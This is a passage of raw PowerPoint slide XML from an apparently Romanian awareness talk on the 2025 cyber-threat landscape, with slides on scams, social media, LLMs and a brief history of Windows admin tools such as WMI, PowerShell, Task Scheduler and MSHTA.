          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>De la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>amuzament</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>targetat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62EEB03D-4494-9DD1-B234-664F3F8C7D5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29741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DAD5C-DB43-6E3F-8ECA-153236760261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="720725"/>
            <a:ext cx="4622887" cy="568960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LLMs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9A2003-E984-B7C1-6E08-A98720C912E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Screens screenshot of a chat&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5558AF22-9C81-539E-2283-BCAE83A4C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9424" y="131958"/>
            <a:ext cx="2996910" cy="6515671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="A screenshot of a phone&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A17BF9A-C69D-1006-9A56-BE6ACFD99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318" y="131958"/>
            <a:ext cx="3018773" cy="6563203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1989857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They Wear Our Faces – A Bitdefender Campaign Against Scams">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{194BED51-0288-0FC6-C1B4-6F1D413D6536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noRot="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <a:videoFile r:link="rId1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="44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42813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computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D764225B-CED5-85AD-5E74-4E99F7723F4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243" b="21243"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC78A04-C76E-9231-1323-2D2C677F42AC}"/>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C0F3EAC-FAE2-0D0A-126D-52167D73BF0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78361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4E7467B-3501-5D57-126D-EF2C0CF6E8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310" b="15310"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96684AC-4908-312F-A992-AEB10AD1295C}"/>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947BF481-2B38-BDE7-E836-D01A710DCD5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25539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computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E666A5-5EC7-AFEF-1773-FDF886B0EB4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540" b="19540"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15132AAF-7079-502C-8D77-EC8EB88A34B7}"/>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824E2F9-41AE-9259-AC8F-DC97E5AF179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47748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7A83B-6B51-F137-D249-8956240B2961}"/>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64F73B1D-52B3-6910-B698-331C243D8298}"/>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899DCBA5-FF8F-470D-D073-85A6B61B220D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social Media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scam-urile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>avansate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{956E8F0D-2B11-07D2-6AB7-60E12D6C902C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214880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86D2-B15B-5DCA-C885-C4DD627127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D8CE03-31E4-74B9-6B48-328A0809C714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Peisajul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> modern al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>amenințărilor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>informatice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 2025</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413335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C77D791-CF5D-FB15-9846-917A08BAC1F6}"/>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27065" r="27065"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6768000" y="946554"/>
            <a:ext cx="5433398" cy="5911446"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D6C989-E00B-D0FF-492D-1006E2B9CF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Scurtă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>istorie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F1BB5E6-FA4B-AE53-9778-5BA62F8B2164}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400051" y="3412317"/>
            <a:ext cx="5637320" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Windows PowerShell: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lansat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2006 (PowerShell 1.0), a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conceput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ca un shell modern de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comandă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>limbaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Windows. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C176AE22-B07E-F5D8-89E2-F8059DEC3C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="5028230"/>
            <a:ext cx="5637320" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Task Scheduler, MSHTA etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ajută</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>administratorii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>să</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatizeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>să</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gestioneze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eficient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sistemele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACADAFD8-137D-10C3-DDD8-542FB628B9AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400051" y="2304321"/>
            <a:ext cx="5637319" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Anul 2000 -  Windows Management Instrumentation (WMI): o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interfață</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unificată</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gestionarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sistemelor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Windows. Windows XP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Windows Server 2003 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>primesc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un instrument de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comandă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>numit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WMIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E96B29-7F5D-032D-4BA7-54AA2C0C32E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Admin Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337055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5670F0-A5DF-AC0D-8FA2-3032D94230C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="7309381" cy="4688973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" b="1" dirty="0">
                <a:effectLst/>
